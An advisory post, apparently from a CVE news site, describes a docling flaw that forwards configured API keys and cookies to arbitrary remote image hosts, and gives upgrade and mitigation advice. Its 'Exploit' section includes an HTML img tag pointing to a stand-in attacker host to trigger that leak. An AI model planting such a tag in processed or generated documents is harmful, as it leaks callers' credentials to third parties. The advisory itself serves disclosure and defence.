Listen to this Post
The vulnerability identified as CVE-2026-105742 affects the docling library, specifically within the HTML image resource loader module located at docling/backend/utils/image_resource_loader.py.
When users parse untrusted HTML documents with remote fetching explicitly enabled via configuration parameters such as enable_remote_fetch=True and fetch_images=True, they often utilize HTMLBackendOptions.headers to pass sensitive authentication tokens, API keys, or cookies.
The core flaw arises because the resource loader merges these configured request headers into every outbound remote image request without checking or validating the destination host against the origin of the source document.
Standard HTTP client libraries typically strip only the Authorization header during cross-host HTTP redirects, leaving custom headers like X-API-Key or Cookie to be fully forwarded across redirect chains to arbitrary external domains.
An attacker can exploit this behavior by embedding a malicious image reference pointing to an external server under their control within an untrusted HTML document.
When the document is processed, docling issues a remote request to the attacker’s URL while inadvertently attaching the caller’s confidential API keys or authentication headers.
This results in the silent disclosure of sensitive credentials to the attacker’s endpoint, compromising the security posture of the calling application.
Mitigation involves restricting header transmission strictly to the trusted origin of the source document and re-validating destination hosts on every redirect hop.
DailyCVE Form:
Platform: Docling project
Version: Under 2.132.0
Vulnerability : Information disclosure
Severity: Low severity
date: October 5, 2026
Prediction: Already patched now
What Undercode Say
The issue highlights the hidden risks of blindly passing global authentication headers across untrusted remote resource loading functions. Developers should always enforce strict origin validation and boundary checks when handling untrusted markup inputs to prevent credential leakage.
Installation and Setup Commands
pip install --upgrade docling
Python Configuration Code
from docling.datamodel.pipeline_options import HTMLBackendOptions
pipeline_options = HTMLBackendOptions(
enable_remote_fetch=True,
fetch_images=True,
headers={"X-API-Key": "secret-api-key"}
)
Exploit: (Educational Purposes!)
<img src="https://attacker.example/pixel.png">
When an application processes an untrusted HTML file containing the above tag with remote fetching and custom headers enabled, the configured `X-API-Key` is automatically transmitted to attacker.example.
Protection: from this CVE
Upgrade the docling package to version 2.132.0 or higher, where header forwarding is restricted exclusively to the original source document’s origin and checked across all redirect hops. For older versions, avoid setting global authentication headers when processing untrusted documents.
Impact
Disclosure of configured request headers and sensitive credentials to arbitrary remote hosts chosen by the document author.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

